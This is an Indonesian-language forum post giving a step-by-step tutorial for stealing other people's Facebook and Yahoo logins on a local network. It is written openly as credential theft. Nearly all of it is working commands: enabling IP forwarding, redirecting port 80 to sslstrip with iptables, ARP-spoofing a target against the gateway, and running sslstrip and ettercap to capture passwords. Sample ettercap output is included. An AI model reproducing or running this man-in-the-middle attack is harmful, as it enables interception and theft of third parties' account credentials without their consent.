Mungkin kalian sudah tau tentang apa itu sniffing, sniffing atau dengan kata lainnya penyadapan paket yang lewat dalam jaringan. jadi ketika user & password yang lewat dalam jaringan bisa berbahaya..... wauuuuu ganas juga yah . berarti kita dapat menyadap (mencuri) user & password (facebook,yahoo,etc) dalam jaringan.
Saya menggunakan OS Backtrack 4 Final dan aplikasi Ettercap, SSLSTRIP, ARPSpoof,IPTABLES jika belum ada silahkan cari di google n download
Ok langsung aja ke Tekniknya :
1. Kopi Cappucino, Rokok Sampoerna, n Koneksi Jaringan dengan kecepatan 1 Gbp/s
2. Edit File /etc/etter.conf
- Code:
-
root@bt:~# kwrite /etc/etter.conf
Cari bagian ini
- Code:
-
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Kemudian Hilangkan tanda # seperti ini :
- Code:
-
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3. Aktifkan IP Forward
- Code:
-
echo 1 > /proc/sys/net/ipv4/ip_forward
4. Redirect port 80 ke port 10000 (sslstrip)
- Code:
-
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
5. Ok sekarang jalankan ArpSpoofing
Contoh
Target : 192.168.2.105
Gateway : 192.168.2.244
- Code:
-
root@bt:~# arpspoof -i wlan0 -t 192.168.2.105 192.168.2.244
6. Kemudian Jalankan SSLSTRIP
- Code:
-
root@bt:~# sslstrip -a -k -f
7. Ok langkah Terakhir Jalankan ettercap
- Code:
-
root@bt:~# ettercap -T -q -i wlan0
Untuk melihat User dan passsword target ketika login (facebook,yahoo,etc) liat pada tab ettercap seperti ini, n jangan di close :
root@bt:~# ettercap -T -q -i wlan0
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> 00:17:C4:9E:FE:24 192.168.2.108 255.255.255.0
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
kalo ada kesulitan silakan posting disini, and keep share